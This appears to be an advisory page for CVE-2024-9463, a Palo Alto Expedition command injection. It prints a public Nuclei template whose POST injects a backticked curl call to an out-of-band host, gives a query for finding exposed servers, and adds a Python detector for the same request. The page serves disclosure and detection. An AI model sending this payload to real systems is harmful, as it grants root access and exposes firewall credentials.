CVE-2024-9463: PaloAlto Networks Expedition - Remote Code Execution

Date: 2025-08-01 | Affected software: PaloAlto Networks Expedition | PoC: public

Vulnerability description

An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.

PoC code [public]

id: CVE-2024-9463

info:
  name: PaloAlto Networks Expedition - Remote Code Execution
  author: princechaddha
  severity: critical
  description: |
    An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
  impact: |
    Successful exploitation could result in unauthorized access and control of the affected device.
  remediation: |
    Apply the necessary security patches provided by Palo Alto Networks to mitigate the CVE-2024-9463 vulnerability.
  reference: |
    - https://x.com/watchtowrcyber/status/1844306954245767623
    - https://security.paloaltonetworks.com/PAN-SA-2024-0010
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9463
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/S
    cvss-score: 9.9
    cve-id: CVE-2024-9463
    cwe-id: CWE-78
    epss-score: 0.94245
    epss-percentile: 0.99924
  metadata:
    verified: true
    max-request: 1
    vendor: paloaltonetworks
    product: expedition
    shodan-query: http.favicon.hash:1499876150
  tags: cve,cve2024,palo-alto,rce,kev,vkev

http:
  - raw:
      - |
        POST /API/convertCSVtoParquet.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ram=watchTowr`curl+{{interactsh-url}}`

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "Undefined index: taskID"
# digest: 4a0a004730450221009e93dc3dd37ded0b9c9886c0861e623c4ea1021d7c18e8305ed1ee56833cf603022020038d57037dfa4ecf0c5bad823234d839829d2ea865a2a9e066e9afbbed6833:922c64590222798bb761d5b6d8e72950
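The template above probes one endpoint and one parameter, so a defender can flag the same shape in captured traffic. The following detector is an added example (not part of the original page, the Nuclei project or Palo Alto's code): it parses a raw HTTP request and reports a POST to /API/convertCSVtoParquet.php whose form field `ram` carries shell metacharacters. The two sample requests and the hostnames in them are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter taken from the public PoC for CVE-2024-9463.
VULN_PATH = "/API/convertCSVtoParquet.php"
VULN_PARAM = "ram"
# Shell metacharacters whose presence in the parameter value indicates an injection attempt.
SHELL_META = re.compile(r"[`;|&\n]|\$\(")


def parse_raw_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, urlsplit(target).path, headers, body


def is_cve_2024_9463_attempt(raw):
    """Return the suspicious 'ram' value if the request matches the PoC shape, else None."""
    method, path, headers, body = parse_raw_request(raw)
    if method.upper() != "POST" or path.lower() != VULN_PATH.lower():
        return None
    # Only form-encoded bodies are inspected here (the PoC's content type); an assumption of this example.
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return None
    params = parse_qs(body, keep_blank_values=True)  # decodes '+' to space like the server would
    for value in params.get(VULN_PARAM, []):
        if SHELL_META.search(value):
            return value
    return None


# Constructed sample requests (hostnames are placeholders, not real systems).
ATTACK_REQUEST = (
    "POST /API/convertCSVtoParquet.php HTTP/1.1\r\n"
    "Host: expedition.example.invalid\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "ram=watchTowr`curl+oob.example.invalid`"
)
BENIGN_REQUEST = ATTACK_REQUEST.rsplit("\r\n", 1)[0] + "\r\nram=export_2024.csv"

if __name__ == "__main__":
    for req in (ATTACK_REQUEST, BENIGN_REQUEST):
        print("ALERT" if is_cve_2024_9463_attempt(req) else "ok", req.rsplit("\r\n", 1)[1])
```

A hit should be correlated with outbound DNS/HTTP from the Expedition host, which is exactly what the template's interactsh matcher relies on.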